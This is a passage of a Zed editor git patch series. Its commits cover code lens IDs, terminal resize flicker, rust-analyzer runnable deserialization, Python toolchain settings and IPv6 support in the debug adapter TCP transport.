a/crates/editor/src/code_lens.rs b/crates/editor/src/code_lens.rs index 87d2426878e575..e93757cb3a0918 100644 --- a/crates/editor/src/code_lens.rs +++ b/crates/editor/src/code_lens.rs @@ -76,8 +76,6 @@ fn group_lenses_by_row( } fn render_code_lens_line( - buffer_id: BufferId, - line_number: usize, lens: CodeLensLine, editor: WeakEntity, ) -> impl Fn(&mut crate::display_map::BlockContext) -> gpui::AnyElement { @@ -103,11 +101,10 @@ fn render_code_lens_line( let action = item.action.clone(); let editor_handle = editor.clone(); let position = lens.position; - let id = SharedString::from(format!("{buffer_id}:{line_number}:{i}")); children.push( div() - .id(ElementId::Name(id)) + .id(ElementId::from(i)) .font(font.clone()) .text_size(font_size) .text_color(cx.app.theme().colors().text_muted) @@ -164,6 +161,7 @@ fn render_code_lens_line( } div() + .id(cx.block_id) .pl(cx.margins.gutter.full_width() + cx.em_width * (lens.indent_column as f32 + 0.5)) .h_full() .flex() @@ -405,16 +403,13 @@ impl Editor { } let blocks = lens_lines .into_iter() - .enumerate() - .map(|(line_number, lens_line)| { + .map(|lens_line| { let position = lens_line.position; BlockProperties { placement: BlockPlacement::Above(position), height: Some(1), style: BlockStyle::Flex, render: Arc::new(render_code_lens_line( - buffer_id, - line_number, lens_line, editor_handle.clone(), )), @@ -546,19 +541,13 @@ impl Editor { .collect(); let blocks = group_lenses_by_row(lenses, &multi_buffer_snapshot) - .enumerate() - .map(|(line_number, lens_line)| { + .map(|lens_line| { let position = lens_line.position; BlockProperties { placement: BlockPlacement::Above(position), height: Some(1), style: BlockStyle::Flex, - render: Arc::new(render_code_lens_line( - buffer_id, - line_number, - lens_line, - editor_handle.clone(), - )), + render: Arc::new(render_code_lens_line(lens_line, editor_handle.clone())), priority: 0, } }) From b7ff4280603a35fd905e7d9a6cecc166951a785e Mon Sep 17 00:00:00 2001 From: Finn Eitreim <48069764+feitreim@users.noreply.github.com> Date: Mon, 27 Apr 2026 02:58:07 -0400 Subject: [PATCH 034/231] editor: Make `editor: expand excerpts` actually expand all excerpts (#54717) Expand all excerpts had a doc comment describing it as expanding all excerpts, but in practice it only expanded the excerpt that was the most relevant. I fixed that to make it expand all excerpts. video: https://github.com/user-attachments/assets/9858ebda-199c-4f72-8a2f-3cd606b0eff4 Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54651 Release Notes: - editor: `expand excerpts` now has correct documentation explaining its function. --- crates/editor/src/actions.rs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/crates/editor/src/actions.rs b/crates/editor/src/actions.rs index 8f14e51fb5a2f7..ccd60186523a32 100644 --- a/crates/editor/src/actions.rs +++ b/crates/editor/src/actions.rs @@ -192,7 +192,7 @@ pub struct SelectDownByLines { pub(super) lines: u32, } -/// Expands all excerpts in the editor. +/// Expands all excerpts with selections. #[derive(PartialEq, Clone, Deserialize, Default, JsonSchema, Action)] #[action(namespace = editor)] #[serde(deny_unknown_fields)] From bb5600ec3c5c53d9362a9b12f51783b32a5449dd Mon Sep 17 00:00:00 2001 From: Bing Wang Date: Mon, 27 Apr 2026 15:13:44 +0800 Subject: [PATCH 035/231] terminal: Reduce flicker on resize (#47195) Skip PTY resizes for pixel-only changes and coalesce pending resize events. Snap standalone terminal layout to whole device pixels to avoid subpixel jitter. before: https://github.com/user-attachments/assets/0ad0db83-0099-44c8-b8d1-3dc8146b25ef after: https://github.com/user-attachments/assets/86278014-1c87-4263-a9e5-b58bcc1fa2ea Release Notes: - Fixed: Reduce terminal flicker on resize --------- Signed-off-by: pigletfly Co-authored-by: Ben Kunkle --- crates/terminal/src/terminal.rs | 68 +++++++++++++++++++- crates/terminal_view/src/terminal_element.rs | 63 ++++++++++++++---- 2 files changed, 118 insertions(+), 13 deletions(-) diff --git a/crates/terminal/src/terminal.rs b/crates/terminal/src/terminal.rs index e47cc2bb8d0d21..3be023e8262f04 100644 --- a/crates/terminal/src/terminal.rs +++ b/crates/terminal/src/terminal.rs @@ -1440,8 +1440,27 @@ impl Terminal { ///Resize the terminal and the PTY. pub fn set_size(&mut self, new_bounds: TerminalBounds) { - if self.last_content.terminal_bounds != new_bounds { - self.events.push_back(InternalEvent::Resize(new_bounds)) + let mut new_bounds = new_bounds; + new_bounds.bounds.size.height = cmp::max(new_bounds.line_height, new_bounds.height()); + new_bounds.bounds.size.width = cmp::max(new_bounds.cell_width, new_bounds.width()); + + let old_bounds = self.last_content.terminal_bounds; + self.last_content.terminal_bounds = new_bounds; + + // Avoid spamming PTY resizes on pixel-level size changes (e.g. while dragging edges), + // since those can generate excessive SIGWINCH/reflows and cause visible flicker. + let requires_resize = old_bounds.num_lines() != new_bounds.num_lines() + || old_bounds.num_columns() != new_bounds.num_columns() + || old_bounds.cell_width != new_bounds.cell_width + || old_bounds.line_height != new_bounds.line_height; + + if !requires_resize { + return; + } + + match self.events.back_mut() { + Some(InternalEvent::Resize(pending_bounds)) => *pending_bounds = new_bounds, + _ => self.events.push_back(InternalEvent::Resize(new_bounds)), } } @@ -3036,6 +3055,51 @@ mod tests { ); } + #[gpui::test] + async fn test_set_size_coalesces_pixel_only_changes(cx: &mut TestAppContext) { + let builder = cx.update(|cx| { + TerminalBuilder::new_display_only( + CursorShape::Block, + AlternateScroll::On, + None, + 0, + cx.background_executor(), + PathStyle::local(), + ) + .unwrap() + }); + let mut terminal = builder.terminal; + + let base_bounds = TerminalBounds { + cell_width: Pixels::from(10.), + line_height: Pixels::from(10.), + bounds: bounds( + Point::default(), + size(Pixels::from(100.), Pixels::from(100.)), + ), + }; + + terminal.set_size(base_bounds); + terminal.events.clear(); + assert_eq!(terminal.last_content.terminal_bounds, base_bounds); + + // Pixel-only change: height grows by 1px but still the same number of rows/cols. + let mut pixel_changed = base_bounds; + pixel_changed.bounds.size.height = Pixels::from(101.); + terminal.set_size(pixel_changed); + assert!(terminal.events.is_empty()); + assert_eq!(terminal.last_content.terminal_bounds, pixel_changed); + + // Grid change: height increases enough to add a row. + let mut grid_changed = base_bounds; + grid_changed.bounds.size.height = Pixels::from(110.); + terminal.set_size(grid_changed); + assert!(matches!( + terminal.events.back(), + Some(InternalEvent::Resize(_)) + )); + } + fn get_cells(size: TerminalBounds, rng: &mut StdRng) -> Vec> { let mut cells = Vec::new(); diff --git a/crates/terminal_view/src/terminal_element.rs b/crates/terminal_view/src/terminal_element.rs index 1e07e1c49d43ac..8f46e8f9b27af4 100644 --- a/crates/terminal_view/src/terminal_element.rs +++ b/crates/terminal_view/src/terminal_element.rs @@ -50,7 +50,6 @@ pub struct LayoutState { mode: TermMode, display_offset: usize, hyperlink_tooltip: Option, - gutter: Pixels, block_below_cursor_element: Option, base_text_style: TextStyle, content_mode: ContentMode, @@ -970,6 +969,7 @@ impl Element for TerminalElement { let mut size = bounds.size; size.width -= gutter; + let available_height = size.height; // https://github.com/zed-industries/zed/issues/2750 // if the terminal is one column wide, rendering 🦀 @@ -981,6 +981,43 @@ impl Element for TerminalElement { let mut origin = bounds.origin; origin.x += gutter; + if matches!(self.terminal_view.read(cx).mode, TerminalMode::Standalone) { + let scale_factor = window.scale_factor(); + let line_height_pixels = px(line_height); + let line_height_device_px = (f32::from(line_height_pixels) * scale_factor) + .round() + .max(1.0) as i32; + let available_height_device_px = + (f32::from(available_height) * scale_factor) + .floor() + .max(0.0) as i32; + + let rows = + ((available_height_device_px / line_height_device_px) as usize).max(1); + let snapped_height_device_px = (rows as i32) * line_height_device_px; + let padding_device_px = + (available_height_device_px - snapped_height_device_px).max(0); + + let snapped_height = + px(snapped_height_device_px as f32 / scale_factor.max(1.0)); + let padding = px(padding_device_px as f32 / scale_factor.max(1.0)); + + size.height = snapped_height; + if self.terminal.read(cx).scrolled_to_bottom() { + origin.y += padding; + } + } + + // Snap to device pixels to avoid subpixel jitter while resizing. + // Terminal rendering is grid-based; allowing fractional origins can cause the + // glyph rasterization to shift between frames, which looks like flicker. + let scale_factor = window.scale_factor(); + let snap_px = |value: Pixels| { + Pixels::from((f32::from(value) * scale_factor).floor() / scale_factor) + }; + origin.x = snap_px(origin.x); + origin.y = snap_px(origin.y); + ( TerminalBounds::new(px(line_height), cell_width, Bounds { origin, size }), line_height, @@ -1018,7 +1055,7 @@ impl Element for TerminalElement { let scroll_top = self.terminal_view.read(cx).scroll_top; let hyperlink_tooltip = hover_tooltip.map(|hover_tooltip| { - let offset = bounds.origin + point(gutter, px(0.)) - point(px(0.), scroll_top); + let offset = dimensions.bounds.origin - point(px(0.), scroll_top); let mut element = div() .size_full() .id("terminal-element") @@ -1062,8 +1099,9 @@ impl Element for TerminalElement { // // This optimization is analogous to the editor optimization in PR #45077 // which fixed performance issues with large AutoHeight editors inside Lists. + let content_bounds = dimensions.bounds; let visible_bounds = window.content_mask().bounds; - let intersection = visible_bounds.intersect(&bounds); + let intersection = visible_bounds.intersect(&content_bounds); // If the terminal is entirely outside the viewport, skip all cell processing. // This handles the case where the terminal has been scrolled past (above or @@ -1073,7 +1111,7 @@ impl Element for TerminalElement { || intersection.size.width <= px(0.) { (Vec::new(), Vec::new()) - } else if intersection == bounds { + } else if intersection == content_bounds { // Fast path: terminal fully visible, no clipping needed. // Avoid grouping/allocation overhead by streaming cells directly. TerminalElement::layout_grid( @@ -1092,9 +1130,9 @@ impl Element for TerminalElement { // by screen position (enumerated line group index), not by the cell's // internal line number (which can be negative in Scrollable mode for // scrollback history). - let rows_above_viewport = - f32::from((intersection.top() - bounds.top()).max(px(0.)) / line_height_px) - as usize; + let rows_above_viewport = f32::from( + (intersection.top() - content_bounds.top()).max(px(0.)) / line_height_px, + ) as usize; let visible_row_count = f32::from((intersection.size.height / line_height_px).ceil()) as usize + 1; @@ -1199,7 +1237,7 @@ impl Element for TerminalElement { block.height as f32 * dimensions.line_height(), ), ); - let origin = bounds.origin + let origin = Point::new(bounds.origin.x, dimensions.bounds.origin.y) + point(px(0.), target_line as f32 * dimensions.line_height()) - point(px(0.), scroll_top); window.with_rem_size(rem_size, |window| { @@ -1225,7 +1263,6 @@ impl Element for TerminalElement { mode, display_offset, hyperlink_tooltip, - gutter, block_below_cursor_element, base_text_style: text_style, content_mode, @@ -1249,8 +1286,12 @@ impl Element for TerminalElement { let scroll_top = self.terminal_view.read(cx).scroll_top; window.paint_quad(fill(bounds, layout.background_color)); - let origin = - bounds.origin + Point::new(layout.gutter, px(0.)) - Point::new(px(0.), scroll_top); + let origin = layout.dimensions.bounds.origin - Point::new(px(0.), scroll_top); + let scale_factor = window.scale_factor(); + let snap_px = |value: Pixels| { + Pixels::from((f32::from(value) * scale_factor).floor() / scale_factor) + }; + let origin = point(snap_px(origin.x), snap_px(origin.y)); let marked_text_cloned: Option = { let ime_state = &self.terminal_view.read(cx).ime_state; From cb4312bb215ffb9611013c699a69bfb9f710f984 Mon Sep 17 00:00:00 2001 From: illimarkangur <116028111+illimarkangur@users.noreply.github.com> Date: Mon, 27 Apr 2026 10:32:47 +0300 Subject: [PATCH 036/231] docs: Fix a typo in themes.md (#54919) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed accidental duplication of words in themes.md --- docs/src/themes.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/src/themes.md b/docs/src/themes.md index 1dd2c144e2a2a5..d78f96250872ee 100644 --- a/docs/src/themes.md +++ b/docs/src/themes.md @@ -106,7 +106,7 @@ For example, add the following to your `settings.json` if you wish to override t } ``` -To see a comprehensive list of list of captures (like `comment` and `comment.doc`) see [Language Extensions: Syntax highlighting](./extensions/languages.md#syntax-highlighting). +To see a comprehensive list of captures (like `comment` and `comment.doc`) see [Language Extensions: Syntax highlighting](./extensions/languages.md#syntax-highlighting). To see a list of available theme attributes look at the JSON file for your theme. For example, [assets/themes/one/one.json](https://github.com/zed-industries/zed/blob/main/assets/themes/one/one.json) for the default One Dark and One Light themes. From 88e017112b21c0fb263e31d81d0d756ce9fdbfa2 Mon Sep 17 00:00:00 2001 From: Rain Date: Mon, 27 Apr 2026 00:36:43 -0700 Subject: [PATCH 037/231] project: Use runnable kind to disambiguate between cargo and shell commands (#54011) Found this bug while investigating why configuring nextest based on the instructions at https://github.com/rust-lang/rust-analyzer/issues/21137#issuecomment-4254611341 wasn't working within Zed. Previously, we'd use `serde(untagged)`, preferring cargo over shell commands. The problem is that every instance of a shell command is a valid instance of a cargo command. For example, the shell command: ```json { "label": "test my_test", "kind": "shell", "args": { "environment": {"RUSTC_TOOLCHAIN": "/path/to/toolchain"}, "cwd": "/project", "program": "cargo", "args": ["nextest", "run", "--package", "my-crate", "--lib", "--", "my_test", "--exact", "--include-ignored"] } } ``` would end up getting deserialized as a Cargo command, silently dropping `program` and `args`. With this fix, we now use the provided `kind` as a tag. We do have to introduce a `#[serde(flatten)]` unfortunately, which has a few side effects due to internal buffering, but `#[serde(untagged)]` also does internal buffering so this doesn't make things worse. I've manually tested this by configuring: ```json { "lsp": { "rust-analyzer": { "initialization_options": { "runnables": { "test": { "overrideCommand": [ "cargo", "nextest", "run", "--package", "${package}", "${target_arg}", "${target}", "--", "${test_name}", "${exact}", "${include_ignored}" ] } } } } } } ``` and ensuring that nextest is correctly invoked. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed deserialization of rust-analyzer shell runnables. --------- Co-authored-by: Kirill Bulatov --- crates/editor/src/runnables.rs | 157 +++++++++++++++++- .../project/src/lsp_store/lsp_ext_command.rs | 109 ++++++++++-- 2 files changed, 253 insertions(+), 13 deletions(-) diff --git a/crates/editor/src/runnables.rs b/crates/editor/src/runnables.rs index b17b9944173629..25db455d462afd 100644 --- a/crates/editor/src/runnables.rs +++ b/crates/editor/src/runnables.rs @@ -715,7 +715,9 @@ mod tests { use multi_buffer::{MultiBuffer, PathKey}; use project::{ FakeFs, Project, ProjectPath, - lsp_store::lsp_ext_command::{CargoRunnableArgs, Runnable, RunnableArgs, RunnableKind}, + lsp_store::lsp_ext_command::{ + CargoRunnableArgs, Runnable, RunnableArgs, ShellRunnableArgs, + }, }; use serde_json::json; use task::{TaskTemplate, TaskTemplates}; @@ -1028,7 +1030,6 @@ mod tests { lsp::Position::new(3, 1), ), }), - kind: RunnableKind::Cargo, args: RunnableArgs::Cargo(CargoRunnableArgs { environment: Default::default(), cwd: path!("/project").into(), @@ -1174,4 +1175,156 @@ mod tests { "Runnables should appear after the buffer is saved to disk" ); } + + // Verifies that a shell runnable from rust-analyzer produces + // a task template that uses the shell program and args. + #[gpui::test] + async fn test_shell_runnable_produces_correct_task_template(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/project"), + json!({ + "main.rs": indoc! {" + #[test] + fn test_one() { + assert!(true); + } + "}, + }), + ) + .await; + + let project = Project::test(fs, [path!("/project").as_ref()], cx).await; + let language_registry = project.read_with(cx, |project, _| project.languages().clone()); + language_registry.add(rust_lang_with_lsp_task_context()); + + let mut fake_servers = language_registry.register_fake_lsp( + "Rust", + FakeLspAdapter { + name: FAKE_LSP_NAME, + ..FakeLspAdapter::default() + }, + ); + + let buffer = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/project/main.rs"), cx) + }) + .await + .unwrap(); + + let buffer_id = buffer.read_with(cx, |buffer, _| buffer.remote_id()); + + let multi_buffer = cx.new(|cx| MultiBuffer::singleton(buffer.clone(), cx)); + let editor = cx.add_window(|window, cx| { + build_editor_with_project(project.clone(), multi_buffer, window, cx) + }); + + let fake_server = fake_servers.next().await.expect("fake LSP server"); + + use project::lsp_store::lsp_ext_command::Runnables; + fake_server.set_request_handler::(move |params, _| async move { + let text = params.text_document.uri.path().to_string(); + if text.contains("main.rs") { + let uri = lsp::Uri::from_file_path(path!("/project/main.rs")).expect("valid uri"); + Ok(vec![Runnable { + label: "nextest test_one".into(), + location: Some(lsp::LocationLink { + origin_selection_range: None, + target_uri: uri, + target_range: lsp::Range::new( + lsp::Position::new(0, 0), + lsp::Position::new(3, 1), + ), + target_selection_range: lsp::Range::new( + lsp::Position::new(0, 0), + lsp::Position::new(3, 1), + ), + }), + args: RunnableArgs::Shell(ShellRunnableArgs { + environment: Default::default(), + cwd: path!("/project").into(), + program: "cargo".into(), + args: vec![ + "nextest".into(), + "run".into(), + "--package".into(), + "my-crate".into(), + "--lib".into(), + "--".into(), + "test_one".into(), + "--exact".into(), + ], + }), + }]) + } else { + Ok(Vec::new()) + } + }); + + editor + .update(cx, |editor, window, cx| { + editor.refresh_runnables(None, window, cx); + }) + .expect("editor update"); + cx.executor().advance_clock(UPDATE_DEBOUNCE); + cx.executor().run_until_parked(); + + let labels = editor + .update(cx, |editor, _, _| collect_runnable_labels(editor)) + .expect("editor update"); + assert_eq!( + labels, + vec![(buffer_id, 0, vec!["nextest test_one".to_string()])], + "shell runnable should appear for #[test] fn" + ); + + let templates = editor + .update(cx, |editor, _, _| { + editor + .runnables + .runnables + .iter() + .flat_map(|(_, (_, tasks))| { + tasks.iter().flat_map(|(_, runnable_tasks)| { + runnable_tasks + .templates + .iter() + .map(|(_, template)| { + ( + template.label.clone(), + template.command.clone(), + template.args.clone(), + ) + }) + .collect::>() + }) + }) + .collect::>() + }) + .expect("editor update"); + + let (label, command, args) = templates + .iter() + .find(|(label, _, _)| label == "nextest test_one") + .expect("shell runnable task template should exist"); + assert_eq!(label, "nextest test_one"); + assert_eq!(command, "cargo"); + assert_eq!( + args, + &[ + "nextest", + "run", + "--package", + "my-crate", + "--lib", + "--", + "test_one", + "--exact", + ], + "shell runnable should preserve program args" + ); + } } diff --git a/crates/project/src/lsp_store/lsp_ext_command.rs b/crates/project/src/lsp_store/lsp_ext_command.rs index 55395bd066326f..bb994492d00f94 100644 --- a/crates/project/src/lsp_store/lsp_ext_command.rs +++ b/crates/project/src/lsp_store/lsp_ext_command.rs @@ -501,7 +501,41 @@ impl LspCommand for GoToParentModule { } // https://rust-analyzer.github.io/book/contributing/lsp-extensions.html#runnables -// Taken from https://github.com/rust-lang/rust-analyzer/blob/a73a37a757a58b43a796d3eb86a1f7dfd0036659/crates/rust-analyzer/src/lsp/ext.rs#L425-L489 +// Taken from https://github.com/rust-lang/rust-analyzer/blob/3aaa35b49ef27e15144952aa4f7ba3eecd36fbb4/crates/rust-analyzer/src/lsp/ext.rs#L425-L489 +// +// Note that in rust-analyzer, `Runnable` is defined as: +// +// ``` +// #[derive(Deserialize, Serialize, Debug, Clone)] +// #[serde(rename_all = "camelCase")] +// pub struct Runnable { +// pub label: String, +// #[serde(skip_serializing_if = "Option::is_none")] +// pub location: Option, +// pub kind: RunnableKind, +// pub args: RunnableArgs, +// } +// +// #[derive(Deserialize, Serialize, Debug, Clone)] +// #[serde(rename_all = "camelCase")] +// #[serde(untagged)] +// pub enum RunnableArgs { +// Cargo(CargoRunnableArgs), +// Shell(ShellRunnableArgs), +// } +// ``` +// +// i.e., RunnableArgs uses serde(untagged) and is not associated with +// RunnableKind. But rust-analyzer always syncs RunnableKind with RunnableArgs: +// +// * https://github.com/rust-lang/rust-analyzer/blob/3aaa35b49ef27e15144952aa4f7ba3eecd36fbb4/crates/rust-analyzer/src/lsp/to_proto.rs#L1608-L1633 +// * https://github.com/rust-lang/rust-analyzer/blob/3aaa35b49ef27e15144952aa4f7ba3eecd36fbb4/crates/rust-analyzer/src/lsp/to_proto.rs#L1648-L1653 +// * https://github.com/rust-lang/rust-analyzer/blob/3aaa35b49ef27e15144952aa4f7ba3eecd36fbb4/crates/rust-analyzer/src/handlers/request.rs#L1052-L1066 +// +// And it really doesn't make any sense for it to be any other way. On top of +// that, the Shell and Cargo variants are similar enough that serde(untagged) +// deserialization has been observed to confuse one for the other. So we rely on +// RunnableKind to determine which variant to deserialize. pub enum Runnables {} impl lsp::request::Request for Runnables { @@ -524,25 +558,20 @@ pub struct Runnable { pub label: String, #[serde(default, skip_serializing_if = "Option::is_none")] pub location: Option, - pub kind: RunnableKind, + #[serde(flatten)] pub args: RunnableArgs, } +/// The `kind` field in the JSON determines which variant is deserialized; see +/// comment on `Runnables` above for more discussion. #[derive(Deserialize, Serialize, Debug, Clone)] -#[serde(rename_all = "camelCase")] -#[serde(untagged)] +#[serde(tag = "kind", content = "args")] +#[serde(rename_all = "lowercase")] pub enum RunnableArgs { Cargo(CargoRunnableArgs), Shell(ShellRunnableArgs), } -#[derive(Serialize, Deserialize, Debug, Clone)] -#[serde(rename_all = "lowercase")] -pub enum RunnableKind { - Cargo, - Shell, -} - #[derive(Deserialize, Serialize, Debug, Clone)] #[serde(rename_all = "camelCase")] pub struct CargoRunnableArgs { @@ -791,3 +820,61 @@ impl lsp::notification::Notification for LspExtClearFlycheck { type Params = (); const METHOD: &'static str = "rust-analyzer/clearFlycheck"; } + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn shell_runnable_deserializes_as_shell() { + // rust-analyzer sends this when `runnables.test.overrideCommand` is + // configured (e.g. for nextest). + let json = serde_json::json!({ + "label": "test my_test", + "kind": "shell", + "args": { + "environment": {"RUSTC_TOOLCHAIN": "/path/to/toolchain"}, + "cwd": "/project", + "program": "cargo", + "args": ["nextest", "run", "--package", "my-crate", "--lib", "--", "my_test", "--exact", "--include-ignored"] + } + }); + + let runnable: Runnable = + serde_json::from_value(json).expect("shell runnable should deserialize"); + let RunnableArgs::Shell(shell) = &runnable.args else { + panic!("expected Shell variant, got {:?}", runnable.args); + }; + assert_eq!(shell.program, "cargo"); + assert_eq!(shell.args[0], "nextest"); + assert_eq!(shell.args[1], "run"); + } + + #[test] + fn cargo_runnable_deserializes_as_cargo() { + // Standard cargo runnable from rust-analyzer. + let json = serde_json::json!({ + "label": "cargo test -p my-crate", + "kind": "cargo", + "args": { + "environment": {}, + "cwd": "/project", + "overrideCargo": null, + "workspaceRoot": "/project", + "cargoArgs": ["test", "--package", "my-crate", "--lib"], + "executableArgs": ["my_test", "--exact"] + } + }); + + let runnable: Runnable = + serde_json::from_value(json).expect("cargo runnable should deserialize"); + let RunnableArgs::Cargo(cargo) = &runnable.args else { + panic!("expected Cargo variant, got {:?}", runnable.args); + }; + assert_eq!( + cargo.cargo_args, + vec!["test", "--package", "my-crate", "--lib"] + ); + assert_eq!(cargo.executable_args, vec!["my_test", "--exact"]); + } +} From 869e7767bf1b76a8d22b507482ca025657bd9a22 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Mon, 27 Apr 2026 05:33:40 -0300 Subject: [PATCH 038/231] Fix spinner in activity indicator (#54977) Quick fix for a little regression I introduced in https://github.com/zed-industries/zed/pull/54791 accidentally removing the rotating spinner icon in the activity indicator. Release Notes: - N/A --- crates/activity_indicator/src/activity_indicator.rs | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/crates/activity_indicator/src/activity_indicator.rs b/crates/activity_indicator/src/activity_indicator.rs index 7aa5b91a4c2f7f..0abb0622f9e64f 100644 --- a/crates/activity_indicator/src/activity_indicator.rs +++ b/crates/activity_indicator/src/activity_indicator.rs @@ -729,13 +729,7 @@ impl Render for ActivityIndicator { } }) .label_size(LabelSize::Small) - .when(content.icon.is_some(), |this| { - this.start_icon( - Icon::new(IconName::LoadCircle) - .color(Color::Muted) - .size(IconSize::Small), - ) - }) + .loading(content.icon.is_some()) .map(|button| { if truncate_content { button.tooltip(Tooltip::text(content.message)) From 663fa80300a77faf9beddb3d7ff3c911e60e8ab9 Mon Sep 17 00:00:00 2001 From: Piotr Osiewicz <24362066+osiewicz@users.noreply.github.com> Date: Mon, 27 Apr 2026 10:40:41 +0200 Subject: [PATCH 039/231] python: Respect user settings for toolchain discovery over the toolchain set in Zed (#48262) Closes #46754 Release Notes: - python: User settings now take precedence over toolchain set in Zed for pyright/basedpyright --- crates/languages/src/python.rs | 30 +++++++++++++++++++++++++++++- 1 file changed, 29 insertions(+), 1 deletion(-) diff --git a/crates/languages/src/python.rs b/crates/languages/src/python.rs index 17a1d24be76559..dd059313b6d4f3 100644 --- a/crates/languages/src/python.rs +++ b/crates/languages/src/python.rs @@ -658,8 +658,22 @@ impl LspAdapter for PyrightLspAdapter { .and_then(|s| s.settings.clone()) .unwrap_or_default(); - // If we have a detected toolchain, configure Pyright to use it + // If we have a detected toolchain, configure Pyright to use it - unless the user sets it themselves. + let should_insert_toolchain = || { + user_settings.as_object().is_none_or(|object| { + [ + "venvPath", + "venv", + "python", + "pythonPath", + "defaultInterpreterPath", + ] + .into_iter() + .any(|known_key| object.contains_key(known_key)) + }) + }; if let Some(toolchain) = toolchain + && should_insert_toolchain() && let Ok(env) = serde_json::from_value::(toolchain.as_json.clone()) { @@ -2075,7 +2089,21 @@ impl LspAdapter for BasedPyrightLspAdapter { .unwrap_or_default(); // If we have a detected toolchain, configure Pyright to use it + let should_insert_toolchain = || { + user_settings.as_object().is_none_or(|object| { + [ + "venvPath", + "venv", + "python", + "pythonPath", + "defaultInterpreterPath", + ] + .into_iter() + .any(|known_key| object.contains_key(known_key)) + }) + }; if let Some(toolchain) = toolchain + && should_insert_toolchain() && let Ok(env) = serde_json::from_value::< pet_core::python_environment::PythonEnvironment, >(toolchain.as_json.clone()) From f69fdfdc0619afb65f7acd3b553867a3349f5c4e Mon Sep 17 00:00:00 2001 From: moktamd <109174491+moktamd@users.noreply.github.com> Date: Mon, 27 Apr 2026 17:42:45 +0900 Subject: [PATCH 040/231] dap: Support IPv6 addresses in TCP transport (#52244) The DAP TCP transport layer was hardcoded to `Ipv4Addr`, so IPv6 addresses like `fd00::a` in a debug config's `connect.host` always failed with `hostname must be IPv4: invalid IPv4 address syntax`. Replaced `Ipv4Addr` with `IpAddr` and `SocketAddrV4` with `SocketAddr` across the `task`, `dap`, `dap_adapters`, and `project` crates. The WASM extension API still uses `u32` for the host field to avoid a breaking WIT interface change; IPv4 round-trips through extensions as before. Fixes #52237 Release Notes: - Fixed DAP TCP transport rejecting IPv6 addresses when connecting to remote debug adapters. --------- Co-authored-by: moktamd --- crates/dap/src/adapters.rs | 4 ++-- crates/dap/src/dap.rs | 4 ++-- crates/dap/src/transport.rs | 10 ++++---- crates/dap_adapters/src/python.rs | 12 +++++----- .../src/wasm_host/wit/since_v0_8_0.rs | 23 ++++++++++++++----- crates/project/src/debugger/dap_store.rs | 4 ++-- crates/project/src/debugger/session.rs | 4 ++-- crates/task/src/debug_format.rs | 12 +++++----- 8 files changed, 42 insertions(+), 31 deletions(-) diff --git a/crates/dap/src/adapters.rs b/crates/dap/src/adapters.rs index 96a35bc8ab66c4..0f4bb937c1b0a9 100644 --- a/crates/dap/src/adapters.rs +++ b/crates/dap/src/adapters.rs @@ -18,7 +18,7 @@ use std::{ borrow::Borrow, ffi::OsStr, fmt::Debug, - net::Ipv4Addr, + net::IpAddr, ops::Deref, path::{Path, PathBuf}, sync::Arc, @@ -106,7 +106,7 @@ impl<'a> From<&'a str> for DebugAdapterName { #[derive(Debug, Clone, PartialEq, Serialize)] pub struct TcpArguments { - pub host: Ipv4Addr, + pub host: IpAddr, pub port: u16, pub timeout: Option, } diff --git a/crates/dap/src/dap.rs b/crates/dap/src/dap.rs index 10a584e61b83f6..72446d86f0c187 100644 --- a/crates/dap/src/dap.rs +++ b/crates/dap/src/dap.rs @@ -6,7 +6,7 @@ pub mod proto_conversions; mod registry; pub mod transport; -use std::net::Ipv4Addr; +use std::net::IpAddr; pub use dap_types::*; use debugger_settings::DebuggerSettings; @@ -26,7 +26,7 @@ use task::{DebugScenario, TcpArgumentsTemplate}; pub async fn configure_tcp_connection( tcp_connection: TcpArgumentsTemplate, -) -> anyhow::Result<(Ipv4Addr, u16, Option)> { +) -> anyhow::Result<(IpAddr, u16, Option)> { let host = tcp_connection.host(); let timeout = tcp_connection.timeout; diff --git a/crates/dap/src/transport.rs b/crates/dap/src/transport.rs index 2bb55af74ec6ff..ff04c414517dcd 100644 --- a/crates/dap/src/transport.rs +++ b/crates/dap/src/transport.rs @@ -18,7 +18,7 @@ use smol::{ }; use std::{ collections::HashMap, - net::{Ipv4Addr, SocketAddrV4}, + net::{IpAddr, SocketAddr}, process::Stdio, sync::Arc, time::Duration, @@ -472,7 +472,7 @@ impl TransportDelegate { pub struct TcpTransport { executor: BackgroundExecutor, pub port: u16, - pub host: Ipv4Addr, + pub host: IpAddr, pub timeout: u64, process: Arc>>, _stderr_task: Option>, @@ -489,8 +489,8 @@ impl TcpTransport { } } - pub async fn unused_port(host: Ipv4Addr) -> Result { - Ok(TcpListener::bind(SocketAddrV4::new(host, 0)) + pub async fn unused_port(host: IpAddr) -> Result { + Ok(TcpListener::bind(SocketAddr::new(host, 0)) .await? .local_addr()? .port()) @@ -598,7 +598,7 @@ impl Transport for TcpTransport { > { let executor = self.executor.clone(); let timeout = self.timeout; - let address = SocketAddrV4::new(self.host, self.port); + let address = SocketAddr::new(self.host, self.port); let process = self.process.clone(); executor.clone().spawn(async move { select! { diff --git a/crates/dap_adapters/src/python.rs b/crates/dap_adapters/src/python.rs index 111eab5a1d1bf4..07eed167e696ee 100644 --- 